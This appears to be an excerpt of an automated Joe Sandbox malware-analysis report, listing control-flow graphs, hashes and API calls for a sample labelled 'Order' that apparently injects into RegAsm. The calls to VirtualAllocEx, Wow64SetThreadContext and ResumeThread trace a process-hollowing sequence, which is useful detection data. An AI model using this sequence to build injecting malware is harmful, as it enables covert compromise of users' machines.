                                                                              control_flow_graph 326 2650614-2651d74 VirtualAllocEx 329 2651d76-2651d7c 326->329 330 2651d7d-2651dbf 326->330 329->330
                                                                              APIs
                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 02651D64
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1641957732.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2650000_JB#40044 Order.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 56701856ae95e4d0dde99554e0dc99dc148e428e64d4751e173a8710008762fe
                                                                              • Instruction ID: bfc9d4f2d2df5d29d04796014943b6c39aa3d27b2536bcbf8bce6ae0a712fc4a
                                                                              • Opcode Fuzzy Hash: 56701856ae95e4d0dde99554e0dc99dc148e428e64d4751e173a8710008762fe
                                                                              • Instruction Fuzzy Hash: 274157B9D052589FCB10CFA9D984A9EFBF1FB0A310F14906AE818B7350D375A945CF68

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 344 2650644-265199c 347 26519b3-26519f9 Wow64SetThreadContext 344->347 348 265199e-26519b0 344->348 349 2651a02-2651a46 347->349 350 26519fb-2651a01 347->350 348->347 350->349
                                                                              APIs
                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 026519E9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1641957732.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2650000_JB#40044 Order.jbxd
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0
                                                                              • Opcode ID: 1c52608967f0b184d1ead7541cff54254da446747e57bf8133481bfd32815afd
                                                                              • Instruction ID: 21ec31ef58fd4502ff62e290cffc6c81c9a9d460c241cdea3a42efe39ce63b24
                                                                              • Opcode Fuzzy Hash: 1c52608967f0b184d1ead7541cff54254da446747e57bf8133481bfd32815afd
                                                                              • Instruction Fuzzy Hash: 96419AB5D012589FCB10CFAAD984AEEFBF0BB49314F10806AE818B7350D374A945CF64

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 334 26505d4-265199c 337 26519b3-26519f9 Wow64SetThreadContext 334->337 338 265199e-26519b0 334->338 339 2651a02-2651a46 337->339 340 26519fb-2651a01 337->340 338->337 340->339
                                                                              APIs
                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 026519E9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1641957732.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2650000_JB#40044 Order.jbxd
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0
                                                                              • Opcode ID: 1932ff22732b29f6f34814fc0b6192c3a1b537b06d11b39d3ed0c865d6ed2140
                                                                              • Instruction ID: d66b3219730b062b19f2567c94f6803e8a14974588098354bca98d11e071e54f
                                                                              • Opcode Fuzzy Hash: 1932ff22732b29f6f34814fc0b6192c3a1b537b06d11b39d3ed0c865d6ed2140
                                                                              • Instruction Fuzzy Hash: 8F418AB4D012589FCB10CFAAD984AEEFBF0BB49314F10806AE818B7350D374A945CF64

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 354 2651930-265199c 356 26519b3-26519f9 Wow64SetThreadContext 354->356 357 265199e-26519b0 354->357 358 2651a02-2651a46 356->358 359 26519fb-2651a01 356->359 357->356 359->358
                                                                              APIs
                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 026519E9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1641957732.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2650000_JB#40044 Order.jbxd
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0
                                                                              • Opcode ID: df9b9073c8c9be35e7b83f27c4f8a174dc44ef802ff7a126bb13d59bf8f7651c
                                                                              • Instruction ID: dfb7f7478340c2e948f2eaec1da40f63e760a46428e8e0209c2941436554be37
                                                                              • Opcode Fuzzy Hash: df9b9073c8c9be35e7b83f27c4f8a174dc44ef802ff7a126bb13d59bf8f7651c
                                                                              • Instruction Fuzzy Hash: 69419AB4D052589FCB10CFAAD984AEEFBF1BB49314F14806AE458B7350D374A945CF64

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 363 265065c-2652455 ResumeThread 366 2652457-265245d 363->366 367 265245e-2652498 363->367 366->367
                                                                              APIs
                                                                              • ResumeThread.KERNELBASE(00000000), ref: 02652445
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1641957732.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2650000_JB#40044 Order.jbxd
                                                                              Similarity
                                                                              • API ID: ResumeThread
                                                                              • String ID:
                                                                              • API String ID: 947044025-0
                                                                              • Opcode ID: ea2fb24d2fc7d0c65c2f0243829d9c50ee82c6d8694263c8faf805be37446024
                                                                              • Instruction ID: 5b1baf3d365fff7693ac50b1c01d5700b177181162d2ca9f6c8a976d45a3d410
                                                                              • Opcode Fuzzy Hash: ea2fb24d2fc7d0c65c2f0243829d9c50ee82c6d8694263c8faf805be37446024
                                                                              • Instruction Fuzzy Hash: E53189B4D01268DFCB10CFA9E984A9EFBF4EB09314F10906AE918B7310D775A945CFA4
                                                                              APIs
                                                                              • ResumeThread.KERNELBASE(00000000), ref: 02652445
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1641957732.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2650000_JB#40044 Order.jbxd
                                                                              Similarity
                                                                              • API ID: ResumeThread
                                                                              • String ID:
                                                                              • API String ID: 947044025-0
                                                                              • Opcode ID: 160ec5199cbd34e45421daeb1e954210c05516d076c977693e1974ed04f1260a
                                                                              • Instruction ID: c75b9520e116c33fdb37a43b8cb257d845597acf4feb5e5b9dd479b2e458c185
                                                                              • Opcode Fuzzy Hash: 160ec5199cbd34e45421daeb1e954210c05516d076c977693e1974ed04f1260a
                                                                              • Instruction Fuzzy Hash: 6031A9B8D012589FCB10CFA9E984ADEFBF0AB09314F10906AE818B7310C775A945CFA4

                                                                              Execution Graph

                                                                              Execution Coverage:9.4%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:64.3%
                                                                              Total number of Nodes:28
                                                                              Total number of Limit Nodes:3
                                                                              execution_graph 16854 17b46d8 16855 17b46d9 16854->16855 16858 17b48c9 16855->16858 16859 17b48e4 16858->16859 16863 17b4f08 16859->16863 16868 17b4ef8 16859->16868 16860 17b4713 16864 17b4f09 16863->16864 16865 17b4ff6 16864->16865 16873 17bc168 16864->16873 16877 17bc76c 16864->16877 16865->16860 16870 17b4efc 16868->16870 16869 17b4ec4 16869->16860 16870->16869 16871 17bc168 LdrInitializeThunk 16870->16871 16872 17bc76c 2 API calls 16870->16872 16871->16869 16872->16869 16874 17bc17a 16873->16874 16876 17bc17f 16873->16876 16874->16865 16875 17bc8a9 LdrInitializeThunk 16875->16874 16876->16865 16876->16874 16876->16875 16878 17bc623 16877->16878 16880 17bc764 LdrInitializeThunk 16878->16880 16882 17bc168 LdrInitializeThunk 16878->16882 16881 17bc8c1 16880->16881 16881->16865 16882->16878 16883 17bca58 16884 17bca5f 16883->16884 16886 17bca65 16883->16886 16885 17bc168 LdrInitializeThunk 16884->16885 16884->16886 16888 17bcde6 16884->16888 16885->16888 16887 17bc168 LdrInitializeThunk 16887->16888 16888->16886 16888->16887
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.4093580413.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_17b0000_RegAsm.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: N
                                                                              • API String ID: 0-1130791706
                                                                              • Opcode ID: 424231ea39c36e6dc4564a115264d32564a7acd267069eb98acf234c729c6225
                                                                              • Instruction ID: 97a53cef658ba3ed855a49e3f3bea193b1fbd7202e6c40613233079a733eed24
                                                                              • Opcode Fuzzy Hash: 424231ea39c36e6dc4564a115264d32564a7acd267069eb98acf234c729c6225
                                                                              • Instruction Fuzzy Hash: CA73E631D1075A8EDB11EF68C894AD9FBB1FF99300F11D69AE45867221EB70AAC4CF41
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.4093580413.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_17b0000_RegAsm.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: K
                                                                              • API String ID: 0-856455061
                                                                              • Opcode ID: f33dc0dd7ed54b3b7c28b5403dc1ef386d420e5982b100fbda4f0a35618baa18
                                                                              • Instruction ID: 926278b28a82ae53c84a7efd31400ce66f90eb4022cca5a6545baa82d09559cd
                                                                              • Opcode Fuzzy Hash: f33dc0dd7ed54b3b7c28b5403dc1ef386d420e5982b100fbda4f0a35618baa18
                                                                              • Instruction Fuzzy Hash: 8033D531C146198EDB11EF68C894ADDFBB1FF99300F14D69AE45867221EB70AAC4CF81

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1206 17b2dd1-17b2ded 1207 17b2def-17b2df1 1206->1207 1208 17b2df6-17b2e06 1206->1208 1209 17b3094-17b309b 1207->1209 1210 17b2e08 1208->1210 1211 17b2e0d-17b2e1d 1208->1211 1210->1209 1213 17b307b-17b3089 1211->1213 1214 17b2e23-17b2e31 1211->1214 1217 17b309c-17b311d 1213->1217 1219 17b308b-17b308f call 17b02a8 1213->1219 1214->1217 1218 17b2e37 1214->1218 1218->1217 1220 17b2e7b-17b2e9d 1218->1220 1221 17b2f3a-17b2f62 1218->1221 1222 17b2e3e-17b2e50 1218->1222 1223 17b2fd6-17b2ffc 1218->1223 1224 17b2e55-17b2e76 1218->1224 1225 17b2f14-17b2f35 1218->1225 1226 17b2f94-17b2fd1 1218->1226 1227 17b2ec8-17b2ee9 1218->1227 1228 17b302f-17b304a call 17b02b8 1218->1228 1229 17b306f-17b3079 1218->1229 1230 17b2eee-17b2f0f 1218->1230 1231 17b304c-17b306d call 17b18c8 1218->1231 1232 17b2ea2-17b2ec3 1218->1232 1233 17b3001-17b302d 1218->1233 1234 17b2f67-17b2f8f 1218->1234 1219->1209 1220->1209 1221->1209 1222->1209 1223->1209 1224->1209 1225->1209 1226->1209 1227->1209 1228->1209 1229->1209 1230->1209 1231->1209 1232->1209 1233->1209 1234->1209
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.4093580413.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_17b0000_RegAsm.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Xbq$$^q
                                                                              • API String ID: 0-1593437937
                                                                              • Opcode ID: 6f82c3e964ced364698c3a56657d760f3808c546d78635ba4ae3b3cfcfd35206
                                                                              • Instruction ID: d16e0a36e7c27f7d9223d4b4e58045b729a950c12b0388aed7a935cf83d86664
                                                                              • Opcode Fuzzy Hash: 6f82c3e964ced364698c3a56657d760f3808c546d78635ba4ae3b3cfcfd35206
                                                                              • Instruction Fuzzy Hash: DC91CA30B002589BDF18DB7C985827EBBB3BFC8710B05856DE446EB388DF3588469791

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1477 17bc168-17bc178 1478 17bc17a 1477->1478 1479 17bc17f-17bc18b 1477->1479 1480 17bc2ab-17bc2b5 1478->1480 1482 17bc18d 1479->1482 1483 17bc192-17bc1a7 1479->1483 1482->1480 1486 17bc2bb-17bc2fb call 17b5d08 1483->1486 1487 17bc1ad-17bc1b8 1483->1487 1505 17bc302-17bc378 call 17b5d08 call 17b5c00 1486->1505 1490 17bc1be-17bc1c5 1487->1490 1491 17bc2b6 1487->1491 1493 17bc1f2-17bc1fd 1490->1493 1494 17bc1c7-17bc1de 1490->1494 1491->1486 1498 17bc20a-17bc214 1493->1498 1499 17bc1ff-17bc207 1493->1499 1494->1505 1506 17bc1e4-17bc1e7 1494->1506 1507 17bc21a-17bc224 1498->1507 1508 17bc29e-17bc2a3 1498->1508 1499->1498 1537 17bc37a 1505->1537 1538 17bc3df-17bc454 call 17b5ca8 1505->1538 1506->1491 1510 17bc1ed-17bc1f0 1506->1510 1507->1491 1515 17bc22a-17bc246 1507->1515 1508->1480 1510->1493 1510->1494 1520 17bc24a-17bc24d 1515->1520 1521 17bc248 1515->1521 1522 17bc24f-17bc252 1520->1522 1523 17bc254-17bc257 1520->1523 1521->1480 1525 17bc25a-17bc268 1522->1525 1523->1525 1525->1491 1531 17bc26a-17bc271 1525->1531 1531->1480 1532 17bc273-17bc279 1531->1532 1532->1491 1534 17bc27b-17bc280 1532->1534 1534->1491 1535 17bc282-17bc295 1534->1535 1535->1491 1542 17bc297-17bc29a 1535->1542 1540 17bc37c-17bc37e 1537->1540 1541 17bc381-17bc384 1537->1541 1548 17bc4f3-17bc4f9 1538->1548 1545 17bc380 1540->1545 1546 17bc385-17bc3b7 1540->1546 1541->1546 1542->1532 1547 17bc29c 1542->1547 1545->1541 1549 17bc3b9 1546->1549 1550 17bc3be-17bc3dc 1546->1550 1547->1480 1551 17bc459-17bc46c 1548->1551 1552 17bc4ff-17bc517 1548->1552 1549->1550 1550->1538 1553 17bc46e 1551->1553 1554 17bc473-17bc4c4 1551->1554 1555 17bc52b-17bc53e 1552->1555 1556 17bc519-17bc526 1552->1556 1553->1554 1574 17bc4d7-17bc4e9 1554->1574 1575 17bc4c6-17bc4d4 1554->1575 1558 17bc540 1555->1558 1559 17bc545-17bc561 1555->1559 1557 17bc8c1-17bc9bf 1556->1557 1564 17bc9c1-17bc9c6 call 17b5ca8 1557->1564 1565 17bc9c7-17bc9d1 1557->1565 1558->1559 1561 17bc568-17bc58c 1559->1561 1562 17bc563 1559->1562 1569 17bc58e 1561->1569 1570 17bc593-17bc5c5 1561->1570 1562->1561 1564->1565 1569->1570 1579 17bc5cc-17bc60e 1570->1579 1580 17bc5c7 1570->1580 1576 17bc4eb 1574->1576 1577 17bc4f0 1574->1577 1575->1552 1576->1577 1577->1548 1582 17bc610 1579->1582 1583 17bc615-17bc61e 1579->1583 1580->1579 1582->1583 1584 17bc846-17bc84c 1583->1584 1585 17bc623-17bc648 1584->1585 1586 17bc852-17bc865 1584->1586 1587 17bc64a 1585->1587 1588 17bc64f-17bc686 1585->1588 1589 17bc86c-17bc887 1586->1589 1590 17bc867 1586->1590 1587->1588 1598 17bc688 1588->1598 1599 17bc68d-17bc6bf 1588->1599 1591 17bc889 1589->1591 1592 17bc88e-17bc8a2 1589->1592 1590->1589 1591->1592 1596 17bc8a9-17bc8bf LdrInitializeThunk 1592->1596 1597 17bc8a4 1592->1597 1596->1557 1597->1596 1598->1599 1601 17bc723-17bc736 1599->1601 1602 17bc6c1-17bc6e6 1599->1602 1603 17bc738 1601->1603 1604 17bc73d-17bc762 1601->1604 1605 17bc6e8 1602->1605 1606 17bc6ed-17bc71b 1602->1606 1603->1604 1609 17bc771-17bc7a9 1604->1609 1610 17bc764-17bc765 1604->1610 1605->1606 1606->1601 1611 17bc7ab 1609->1611 1612 17bc7b0-17bc811 call 17bc168 1609->1612 1610->1586 1611->1612 1618 17bc818-17bc83c 1612->1618 1619 17bc813 1612->1619 1622 17bc83e 1618->1622 1623 17bc843 1618->1623 1619->1618 1622->1623 1623->1584
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.4093580413.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_17b0000_RegAsm.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4d2297372d77600ef2a9c07a31f251537cb6c2a53ced928d7554c97aebcc5461
                                                                              • Instruction ID: 4f41599725df5002af142738ce12b30cdb4264a2f40a0654c999e97606bd1eee
                                                                              • Opcode Fuzzy Hash: 4d2297372d77600ef2a9c07a31f251537cb6c2a53ced928d7554c97aebcc5461
                                                                              • Instruction Fuzzy Hash: D9222374E002198FDB15DFA8D984BDDFBB2BF88300F1485A9E409AB355DB35A981CF90

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1888 17b4f08-17b4f28 1890 17b4f2a 1888->1890 1891 17b4f2f-17b4fc0 1888->1891 1890->1891 1895 17b4fc6-17b4fd6 1891->1895 1896 17b5314-17b5348 1891->1896 1945 17b4fd9 call 17b5358 1895->1945 1946 17b4fd9 call 17b56af 1895->1946 1947 17b4fd9 call 17b5366 1895->1947 1899 17b4fdf-17b4fee 1948 17b4ff0 call 17bc168 1899->1948 1949 17b4ff0 call 17bc76c 1899->1949 1900 17b4ff6-17b5012 1902 17b5019-17b5022 1900->1902 1903 17b5014 1900->1903 1904 17b5307-17b530d 1902->1904 1903->1902 1905 17b5313 1904->1905 1906 17b5027-17b50a1 1904->1906 1905->1896 1911 17b515d-17b51b8 1906->1911 1912 17b50a7-17b5115 call 17b3760 1906->1912 1924 17b51b9-17b5209 1911->1924 1922 17b5158-17b515b 1912->1922 1923 17b5117-17b5157 1912->1923 1922->1924 1923->1922 1929 17b520f-17b52f1 1924->1929 1930 17b52f2-17b52fd 1924->1930 1929->1930 1932 17b52ff 1930->1932 1933 17b5304 1930->1933 1932->1933 1933->1904 1945->1899 1946->1899 1947->1899 1948->1900 1949->1900
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.4093580413.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_17b0000_RegAsm.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 95ea1f70e65a1ded5a8d91697362068a78e291e6666ff9edabc91e6a818608b0
                                                                              • Instruction ID: cf83cbbc7e458ddb03fde1a24d883dbf3f78ca05254c22400c1a561673479ee0
                                                                              • Opcode Fuzzy Hash: 95ea1f70e65a1ded5a8d91697362068a78e291e6666ff9edabc91e6a818608b0
                                                                              • Instruction Fuzzy Hash: 1EC19174E01218CFDB54DFA9D998B9DBBB2FB88300F1080AAD809AB355DB355E85CF51

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1950 17b5358-17b535e 1951 17b5360-17b5362 1950->1951 1952 17b5365 1950->1952 1953 17b5369-17b5393 1951->1953 1954 17b5364 1951->1954 1955 17b539a-17b542d 1953->1955 1956 17b5395 1953->1956 1954->1952 1966 17b5433-17b5445 1955->1966 1967 17b5687-17b5786 1955->1967 1956->1955 2015 17b544a call 17b5e21 1966->2015 2016 17b544a call 17b5e30 1966->2016 1971 17b5788-17b578e 1967->1971 1972 17b578f-17b5796 1967->1972 1969 17b5450-17b546e 1976 17b547d-17b5481 1969->1976 1977 17b5470-17b5474 1969->1977 1971->1972 1980 17b5488 1976->1980 1981 17b5483 1976->1981 1978 17b547b 1977->1978 1979 17b5476 1977->1979 1978->1980 1979->1978 2017 17b5488 call 17b7551 1980->2017 2018 17b5488 call 17b7560 1980->2018 2019 17b5488 call 17b75d0 1980->2019 2020 17b5488 call 17b75c0 1980->2020 1981->1980 1982 17b548e-17b54af 2021 17b54b4 call 17b7551 1982->2021 2022 17b54b4 call 17b7560 1982->2022 2023 17b54b4 call 17b75d0 1982->2023 2024 17b54b4 call 17b75c0 1982->2024 1984 17b54ba-17b54e1 1987 17b54e8-17b54ef 1984->1987 1988 17b54e3 1984->1988 2011 17b54f5 call 17b78a9 1987->2011 2012 17b54f5 call 17b7a40 1987->2012 1988->1987 1989 17b54fb-17b556d 1995 17b556f 1989->1995 1996 17b5574-17b5578 1989->1996 1995->1996 1997 17b557a 1996->1997 1998 17b557f-17b5584 1996->1998 1997->1998 1999 17b558b-17b5655 1998->1999 2000 17b5586 1998->2000 2007 17b566d-17b567c 1999->2007 2008 17b5657-17b566a 1999->2008 2000->1999 2013 17b567f call 17b7e68 2007->2013 2014 17b567f call 17b7e63 2007->2014 2008->2007 2009 17b5685-17b5686 2009->1967 2011->1989 2012->1989 2013->2009 2014->2009 2015->1969 2016->1969 2017->1982 2018->1982 2019->1982 2020->1982 2021->1984 2022->1984 2023->1984 2024->1984
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.4093580413.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_17b0000_RegAsm.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4db29bd5a690b10658c7b3c78b127c9c8be55ae4c6494aa6e1eebb1cfd541eca
                                                                              • Instruction ID: 963c0a2839887fcf5b8d3585325a8b9974c9398386d7ab807cd96e4b4b089177
                                                                              • Opcode Fuzzy Hash: 4db29bd5a690b10658c7b3c78b127c9c8be55ae4c6494aa6e1eebb1cfd541eca
                                                                              • Instruction Fuzzy Hash: F4A11470E00209CFEB14DFA8D988BDDFBB1BF88300F209269E509AB295DB755984CF50
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.4093580413.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_17b0000_RegAsm.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0ed3239ba82b83031b98cca886af5fdca91d6592d1195b15eae8f188341799a1
                                                                              • Instruction ID: 38f83c12c45fe17b1db468ebebb50d10c5f659259ecaf56cbef6050c95ecf778
                                                                              • Opcode Fuzzy Hash: 0ed3239ba82b83031b98cca886af5fdca91d6592d1195b15eae8f188341799a1
                                                                              • Instruction Fuzzy Hash: F3A1E470E00209CFEB14DFA9D988BDDBBB1FF88304F209269E509AB295DB755984CF50
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.4093580413.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_17b0000_RegAsm.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ab355bf7ce7476cbc0aafe3642cab86cabfd14a676c7657b9051858fcbeb13d6
                                                                              • Instruction ID: ac510c6595ff54376e96451a27e4e52e6a17e4e86954e958d228200d7325101d
                                                                              • Opcode Fuzzy Hash: ab355bf7ce7476cbc0aafe3642cab86cabfd14a676c7657b9051858fcbeb13d6
                                                                              • Instruction Fuzzy Hash: A291F270E00208CFEB14DFA8D988BDCBBB1FF49314F209269E509AB295DB759985CF54
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.4093580413.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_17b0000_RegAsm.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b31efc5d7ed9da0bf6a3ef1acabfd14a0b242f9f64ed3aee25d16af06d4c473d
                                                                              • Instruction ID: 4b2c5f4ff44788079930edbdc8157f5afb21554986406f02aefda529d4eca273
                                                                              • Opcode Fuzzy Hash: b31efc5d7ed9da0bf6a3ef1acabfd14a0b242f9f64ed3aee25d16af06d4c473d
                                                                              • Instruction Fuzzy Hash: 9741D474D01208CBDB18CFAAD9847EEFBF2AB88304F24D12AD419AB259DB355946CF51
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.4100257066.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7240000_RegAsm.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 92c88e8b89a691727b9e0a625d57a850623e73cd58f4437b68c1649a6683d947
                                                                              • Instruction ID: affb4f8467605ba5c30ed1bf5c37c196ca2837ffe74aeaff4baefccf7f795b23
                                                                              • Opcode Fuzzy Hash: 92c88e8b89a691727b9e0a625d57a850623e73cd58f4437b68c1649a6683d947
                                                                              • Instruction Fuzzy Hash: EE3102B4D90219DFCB68DFA8D4846ECBBB6FF4A300F10912AD015B7290D7399882CF14
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.4100257066.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7240000_RegAsm.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ef133d046e849b24f94663ad65b9f13ca9529c7bc9f2839baf4d23d4e53515da
                                                                              • Instruction ID: 8dbed702f480022acad9c2df576724d4cc497aa5d6fee07a13bc808f1d717d95
                                                                              • Opcode Fuzzy Hash: ef133d046e849b24f94663ad65b9f13ca9529c7bc9f2839baf4d23d4e53515da
                                                                              • Instruction Fuzzy Hash: AD3125B0D4120ACFDB58EFB9C4442EDBBB2EF89304F14902AD014B7294DB754886CF54

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1624 17bc76c 1625 17bc82b-17bc83c 1624->1625 1626 17bc83e 1625->1626 1627 17bc843-17bc84c 1625->1627 1626->1627 1629 17bc623-17bc648 1627->1629 1630 17bc852-17bc865 1627->1630 1631 17bc64a 1629->1631 1632 17bc64f-17bc686 1629->1632 1633 17bc86c-17bc887 1630->1633 1634 17bc867 1630->1634 1631->1632 1642 17bc688 1632->1642 1643 17bc68d-17bc6bf 1632->1643 1635 17bc889 1633->1635 1636 17bc88e-17bc8a2 1633->1636 1634->1633 1635->1636 1640 17bc8a9-17bc8bf LdrInitializeThunk 1636->1640 1641 17bc8a4 1636->1641 1644 17bc8c1-17bc9bf 1640->1644 1641->1640 1642->1643 1649 17bc723-17bc736 1643->1649 1650 17bc6c1-17bc6e6 1643->1650 1647 17bc9c1-17bc9c6 call 17b5ca8 1644->1647 1648 17bc9c7-17bc9d1 1644->1648 1647->1648 1652 17bc738 1649->1652 1653 17bc73d-17bc762 1649->1653 1654 17bc6e8 1650->1654 1655 17bc6ed-17bc71b 1650->1655 1652->1653 1659 17bc771-17bc7a9 1653->1659 1660 17bc764-17bc765 1653->1660 1654->1655 1655->1649 1661 17bc7ab 1659->1661 1662 17bc7b0-17bc811 call 17bc168 1659->1662 1660->1630 1661->1662 1668 17bc818-17bc82a 1662->1668 1669 17bc813 1662->1669 1668->1625 1669->1668
                                                                              APIs
                                                                              • LdrInitializeThunk.NTDLL(00000000), ref: 017BC8AE
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.4093580413.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_17b0000_RegAsm.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 189fa2cb211d906eef2f901cca53e7df8576c740e6ff8f921ff9ddf9c35cb2b8
                                                                              • Instruction ID: 2e35080e3674bb2233e49ea6fb11a6f1eb9817da6988e03b97f87deb17d5a6dc
                                                                              • Opcode Fuzzy Hash: 189fa2cb211d906eef2f901cca53e7df8576c740e6ff8f921ff9ddf9c35cb2b8
                                                                              • Instruction Fuzzy Hash: 7D112974E011099FDB05DFA8D4C4BEDFBB5BB88314F54D165E904E7246DB30A9418B60
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.4100257066.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7240000_RegAsm.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 53e53a6ae6c747f64448e763bdbeb3025b1baf6737a60f802925f001a7c113a3
